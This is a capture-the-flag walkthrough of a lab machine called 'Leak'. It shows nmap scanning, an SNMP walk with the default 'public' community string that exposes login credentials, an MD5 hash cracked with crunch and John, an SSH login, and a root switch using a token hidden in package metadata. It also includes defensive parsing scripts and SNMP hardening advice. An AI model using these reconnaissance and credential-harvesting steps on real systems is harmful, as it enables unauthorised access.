Leak

Target description

QQ group: 660930334

Host discovery

┌──(root㉿kali)-[/tmp]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-01 09:13 CST
Nmap scan report for 192.168.2.1
Host is up (0.00067s latency).
MAC Address: 0A:00:27:00:00:0A (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00045s latency).
MAC Address: 08:00:27:1A:06:78 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.42
Host is up (0.00046s latency).
MAC Address: 08:00:27:A6:0D:F6 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.23 seconds

IP address: 192.168.2.42

Port scanning

1. Full port scan

┌──(root㉿kali)-[/tmp]
└─# nmap --min-rate 10000 -p- 192.168.2.42
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-01 09:13 CST
Nmap scan report for 192.168.2.42
Host is up (0.00018s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:A6:0D:F6 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 3.48 seconds

Open ports: 22 and 80

2. Service and version scan

┌──(root㉿kali)-[/tmp]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80 192.168.2.42
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-01 09:13 CST
Nmap scan report for 192.168.2.42
Host is up (0.013s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-title: Kali Linux - \xE5\xAE\x89\xE5\x85\xA8\xE6\xB8\x97\xE9\x80\x8F\xE6\xB5\x8B\xE8\xAF\x95\xE5\xB9\xB3\xE5\x8F\xB0
|_http-server-header: Apache/2.4.62 (Debian)
MAC Address: 08:00:27:A6:0D:F6 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.37 seconds

3. UDP port scan

┌──(root㉿kali)-[/tmp]
└─# nmap -sU --top-ports 20 192.168.2.42
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-01 19:55 CST
Nmap scan report for sunset.leak.dsz (192.168.2.42)
Host is up (0.00075s latency).

PORT STATE SERVICE
53/udp closed domain
67/udp closed dhcps
68/udp open|filtered dhcpc
69/udp closed tftp
123/udp closed ntp
135/udp closed msrpc
137/udp closed netbios-ns
138/udp closed netbios-dgm
139/udp closed netbios-ssn
161/udp open snmp
162/udp closed snmptrap
445/udp closed microsoft-ds
500/udp closed isakmp
514/udp closed syslog
520/udp closed route
631/udp closed ipp
1434/udp closed ms-sql-m
1900/udp closed upnp
4500/udp closed nat-t-ike
49152/udp closed unknown
MAC Address: 08:00:27:A6:0D:F6 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 18.18 seconds

Open port found: 161, the SNMP service

Web penetration

1. Port 80

Browse to port 80.

1- Directory scan

┌──(root㉿kali)-[/tmp]
└─# gobuster dir -u http://192.168.2.42 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html,bak
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.2.42
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,html,bak
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 277]
/index.html (Status: 200) [Size: 15740]
/.php (Status: 403) [Size: 277]
/.php (Status: 403) [Size: 277]
/.html (Status: 403) [Size: 277]
/server-status (Status: 403) [Size: 277]
Progress: 1102800 / 1102805 (100.00%)
===============================================================
Finished
===============================================================

No other directories were found; there is basically nothing here.

2. Port 161

1. SNMP information disclosure

Since the service on port 161 is SNMP, and SNMP services frequently leak large amounts of sensitive information when misconfigured, snmpwalk is used directly to pull the information.

┌──(root㉿kali)-[/tmp]
└─# snmpwalk -v 2c -c public 192.168.2.42 > 1.txt

In the file, a username and password for a service called leak-service were found: Shinozaki:ShinozakiAi

No way to use them was found at first. After asking the group owner, who said there is a domain name in the output, a search turned up only admin@sunset.leak.dsz as anything domain-like. Since a domain name cannot contain @, the domain is probably sunset.leak.dsz.

Append it to the hosts file
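As an added example (not code from the original write-up), a small Python script that parses snmpwalk output into OID/type/value rows and flags the two things this walkthrough had to find by hand: credential-looking strings and a domain name. The walk excerpt is constructed; the OIDs are real MIB-2 locations (sysContact, hrSWRunParameters) but the values are made up.

```python
import re

# Constructed excerpt in net-snmp's default snmpwalk output format (not the
# walkthrough's real 1.txt); OIDs are real MIB-2 locations, values are made up.
SAMPLE_WALK = """\
iso.3.6.1.2.1.1.1.0 = STRING: "Linux Leak 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 x86_64"
iso.3.6.1.2.1.1.4.0 = STRING: "admin@sunset.leak.dsz"
iso.3.6.1.2.1.1.5.0 = STRING: "Leak"
iso.3.6.1.2.1.25.1.1.0 = Timeticks: (1234500) 3:25:45.00
iso.3.6.1.2.1.25.4.2.1.5.812 = STRING: "-u Shinozaki -p ShinozakiAi"
iso.3.6.1.4.1.2021.4.5.0 = INTEGER: 2014732
"""

LINE_RE = re.compile(r'^(?P<oid>\S+) = (?P<type>[A-Za-z0-9-]+): ?(?P<value>.*)$')
EMAIL_RE = re.compile(r'[\w.+-]+@([\w-]+(?:\.[\w-]+)+)')
FQDN_RE = re.compile(r'\b(?:[a-z0-9-]+\.){2,}[a-z]{2,}\b', re.I)
# "user X ... pass Y" in the forms seen in process command lines and config strings
CRED_RE = re.compile(
    r'(?:--user|-u|user(?:name)?)[\s=:]+(\S+).*?'
    r'(?:--pass(?:word)?|-p|pass(?:word)?)[\s=:]+(\S+)', re.I)

def parse_walk(text):
    """Parse snmpwalk lines into (oid, type, value); quotes around STRING values are stripped."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        value = m['value']
        if m['type'] == 'STRING' and len(value) >= 2 and value[0] == value[-1] == '"':
            value = value[1:-1]
        rows.append((m['oid'], m['type'], value))
    return rows

def find_leaks(text):
    """Collect domains (from e-mail addresses and bare FQDNs) and credential pairs in STRING values."""
    domains, creds = set(), []
    for oid, typ, value in parse_walk(text):
        if typ != 'STRING':
            continue
        for m in EMAIL_RE.finditer(value):
            domains.add(m.group(1).lower())
        for m in FQDN_RE.finditer(value):
            domains.add(m.group(0).lower())
        m = CRED_RE.search(value)
        if m:
            creds.append((oid, m.group(1), m.group(2)))
    return {'domains': sorted(domains), 'credentials': creds}

if __name__ == '__main__':
    print(find_leaks(SAMPLE_WALK))
```

Run it against a real walk with `find_leaks(open('1.txt').read())`; the same check is useful on the defending side to see what an agent with a known community string exposes.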

┌──(root㉿kali)-[/tmp]
└─# echo "192.168.2.42 sunset.leak.dsz" >> /etc/hosts

Visiting sunset.leak.dsz shows the same page as before.

2- Directory scan

┌──(root㉿kali)-[/tmp]
└─# gobuster dir -u http://sunset.leak.dsz -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html,bak
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://sunset.leak.dsz
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,html,bak
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 280]
/.html (Status: 403) [Size: 280]
/index.html (Status: 200) [Size: 15740]
/manager (Status: 301) [Size: 320] [--> http://sunset.leak.dsz/manager/]
/.html (Status: 403) [Size: 280]
/.php (Status: 403) [Size: 280]
/server-status (Status: 403) [Size: 280]
Progress: 1102800 / 1102805 (100.00%)
===============================================================
Finished
===============================================================

A directory named manager exists.

Accessing it requires a username and password; logging in with the credentials found via SNMP, Shinozaki:ShinozakiAi, succeeds.

The page already spells out the steps to follow, so just follow them.

3- Cracking with John

Use crunch to generate an 8-character wordlist beginning with baba

┌──(root㉿kali)-[/tmp]
└─# crunch 8 8 -t baba@@@@ -o wordlist.txt
Crunch will now generate the following amount of data: 4112784 bytes
3 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 456976

crunch: 100% completed generating output

Crack it with John

┌──(root㉿kali)-[/tmp]
└─# echo "d21715210cb6224f9ff4c075a8906fe9" > hashes.txt
┌──(root㉿kali)-[/tmp]
└─# john --format=raw-md5 --wordlist=wordlist.txt hashes.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 128/128 AVX 4x3])
Warning: no OpenMP support for this hash type, consider --fork=8
Press 'q' or Ctrl-C to abort, almost any other key for status
babadawo (?)
1g 0:00:00:00 DONE (2025-07-01 19:33) 100.0g/s 5337Kp/s 5337Kc/s 5337KC/s babadaro..babadayx
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed.

Password found: babadawo

Log in directly with the username and password

┌──(root㉿kali)-[/tmp]
└─# ssh ai@192.168.2.42
ai@192.168.2.42's password:
Linux Leak 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
ai@Leak:~$ id
uid=1000(ai) gid=1000(ai) groups=1000(ai)

USER FLAG

ai@Leak:~$ cat user.txt 
flag{user-13421fec-559d-11f0-a1af-5f1558743b4d}

Privilege escalation

Running sudo -l prompts for a password

ai@Leak:~$ sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.

[sudo] password for ai:

Looking in the current (home) directory, a .bash_history file exists

ai@Leak:~$ cat .bash_history 
leak-date

1. Inspect the system's packages

List the packages installed on the system

ai@Leak:~$ dpkg -l | grep leak
ii leak-date 1.0-1 amd64 Simple date and time display utility
ii liblsan0:amd64 10.2.1-6 amd64 LeakSanitizer -- a memory leak detector (runtime)

One package has the same name as the entry in .bash_history; look at its details

ai@Leak:~$ dpkg -s leak-date
Package: leak-date
Status: install ok installed
Priority: optional
Section: utils
Installed-Size: 500
Maintainer: Security Admin <admin@leak.dsz>
Architecture: amd64
Version: 1.0-1
Description: Simple date and time display utility
This package provides a minimal CLI utility to display
the current system date and time. Ideal for scripts and
system monitoring. SECURITY NOTICE: System debug token
IMKCFRunLoopWakeUpReliable for root access.

The last line hints "IMKCFRunLoopWakeUpReliable for root access": the string IMKCFRunLoopWakeUpReliable is used for root access.

Switch to the root user directly
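As an added example (not code from the write-up), a Python audit that parses dpkg control-format output and flags package descriptions containing secret-like terms, which is how a token hidden in package metadata like the one above can be caught. The stanzas are constructed with a placeholder in place of the real token; audit_installed() runs the same check over a live Debian host via dpkg-query.

```python
import re
import subprocess

# Constructed stanzas in dpkg's control format (the layout dpkg -s prints);
# the first mirrors the target's description, with a placeholder for the token.
SAMPLE_STATUS = """\
Package: leak-date
Version: 1.0-1
Description: Simple date and time display utility
 This package provides a minimal CLI utility to display
 the current system date and time. SECURITY NOTICE: System debug token
 EXAMPLE-TOKEN-PLACEHOLDER for root access.

Package: coreutils
Version: 8.32-4
Description: GNU core utilities
 This package contains the basic file, shell and text manipulation
"""

# Terms that have no business in a package description.
SUSPICIOUS_RE = re.compile(
    r'\b(token|password|passwd|secret|credential|api[_ -]?key|root access)\b', re.I)

def parse_stanzas(text):
    """Split control-format text into dicts; indented continuation lines are joined."""
    pkgs, cur, last = [], {}, None
    for line in text.splitlines():
        if not line.strip():              # blank line ends a stanza
            if cur:
                pkgs.append(cur)
            cur, last = {}, None
        elif line[0] in ' \t' and last:   # continuation of the previous field
            cur[last] += ' ' + line.strip()
        elif ':' in line:
            last, _, val = line.partition(':')
            cur[last] = val.strip()
    if cur:
        pkgs.append(cur)
    return pkgs

def suspicious_packages(text):
    """Return [(package, keyword)] for descriptions that mention secret-like terms."""
    hits = []
    for pkg in parse_stanzas(text):
        m = SUSPICIOUS_RE.search(pkg.get('Description', ''))
        if m:
            hits.append((pkg['Package'], m.group(1).lower()))
    return hits

def audit_installed():
    """Same check over the live system; dpkg-query prints every package in this layout."""
    fmt = 'Package: ${Package}\nDescription: ${Description}\n\n'
    out = subprocess.run(['dpkg-query', '-W', '-f', fmt], capture_output=True, text=True, check=True).stdout
    return suspicious_packages(out)
```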

ai@Leak:~$ su root
Password:
root@Leak:/home/ai# id
uid=0(root) gid=0(root) groups=0(root)

ROOT FLAG

root@Leak:/home/ai# cat /root/root.txt
flag{root-357d3d08-5598-11f0-a27e-639fd7e7110b}

[Summary]

1. SNMP penetration

1- Common SNMP attack methods

  • Exploiting default community strings: many devices ship with two default community strings, "public" (read-only) and "private" (read-write). An attacker can try these defaults to obtain device information such as the model and configuration files.
  • Brute-forcing community strings: using scripts or tools to brute-force a device's SNMP community string; once it succeeds, the attacker may gain management access to the device.
  • Exploiting SNMP vulnerabilities: some devices' SNMP implementations contain flaws such as buffer overflows or command injection, which an attacker can trigger with crafted requests to take control of the device or obtain sensitive information.
  • Information gathering: obtaining system information, interface information, routing tables and so on via SNMP, then analysing it to find weak points in the network and prepare further attacks. For example, IP addresses, MAC addresses and port states help an attacker understand the network topology.

2- SNMP tools

  • snmpget: retrieves the value of a single SNMP object. For example, snmpget -v2c -c public 10.10.11.48 1.3.6.1.2.1.1.1.0 queries the device's system description.
  • snmpwalk: retrieves the values of a whole subtree of SNMP objects. For example, snmpwalk -v2c -c public 10.10.11.48 1.3.6.1.2.1.1 retrieves the device's system information.
  • snmp-check: checks a target's SNMP information, such as system and interface details. For example, snmp-check -c public 10.10.11.48 checks the target's SNMP information.
  • cisc0wn: an attack script for Cisco routers and switches with SNMP enabled; it can brute-force the community string, download configuration files and crack passwords.
  • h3c-pt-tools: for penetration testing and auditing of Huawei, HP and H3C devices; its nmap scripts and msf modules can be used for automated SNMP attacks.

3- Defences against SNMP attacks

  • Change default community strings: replace the device's default community strings with complex, unique ones; never leave the defaults "public" and "private" in place.
  • Restrict access: use a firewall or access control lists (ACLs) to limit access to the SNMP ports (UDP 161/162) to specific IP addresses or network segments.
  • Enable authentication and encryption: on devices that support SNMP v3, enable authentication and encryption to protect SNMP traffic.
  • Audit and monitor regularly: periodically audit the SNMP configuration of network devices for weaknesses, and monitor SNMP traffic in real time to catch anomalous behaviour early.

[References]

2. Privilege escalation: software packages


Leak
http://miao-sec.github.io/Maze-sec/Leak/
Author
Miao
Published on
July 1, 2025
License
BY-MIAO